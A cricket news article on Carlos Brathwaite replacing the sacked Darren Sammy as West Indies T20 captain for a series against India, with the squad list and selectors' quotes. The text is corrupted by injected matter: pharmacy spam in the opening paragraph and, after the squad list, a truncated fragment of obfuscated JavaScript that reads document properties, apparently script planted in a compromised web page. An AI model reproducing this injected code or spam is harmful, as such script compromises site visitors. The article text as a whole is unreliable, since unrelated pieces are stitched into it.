Carlos Brathwaite, the all-rounder, will now lead West Indies in the shortest format of the game as their captain in the two-match series against India in Florida. Former skipper Darren Sammy was sacked and did not make the cut for the 13-man squad. order baclofen online cheap, cheap zithromax.

“Brathwaite is one of the most talented players in the T20 format of the game and his humble and committed approach to the game can inspire young and upcoming players,” Browne said. “We are looking forward to a competitive series against India in these matches.”

Carlos Brathwaite has played 25 international matches for West Indies so far
Carlos Brathwaite has played 25 international matches for West Indies so far.

Sammy, the two-time World T20 winning captain, posted a video on his Facebook account in which he said that the news of his sacking was broken to him in a 30-second call by the chairman of selectors.

A WICB release said: “With regards to Sammy’s omission from the squad, the Chairman [of selectors Courtney Browne] noted that the named-squad was selected purely on players’ performances.”

The selection panel expressed their gratitude to the former skipper, Darren Sammy, for his leadership during the two World Championship victories a one in 2012, and one earlier this year.

28-year-old Brathwaite had struck four consecutive sixes to win West Indies their second World T20 final in India this year. He has played seven ODIs, the CPL and a Test against India in Antigua since then.

The 13-man squad for the upcoming T20 series against India inclues:
Andre Fletcher, Andre Russell, Carlos Brathwaite (capt), Chris Gayle, Dwayne Bravo, Evin Lewis, Jason Holder, Johnson Charles, Kieron Pollard, Lendl Simmons, Marlon Samuels, Samuel Badree, Sunil Narine. 22[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}


Leave A Reply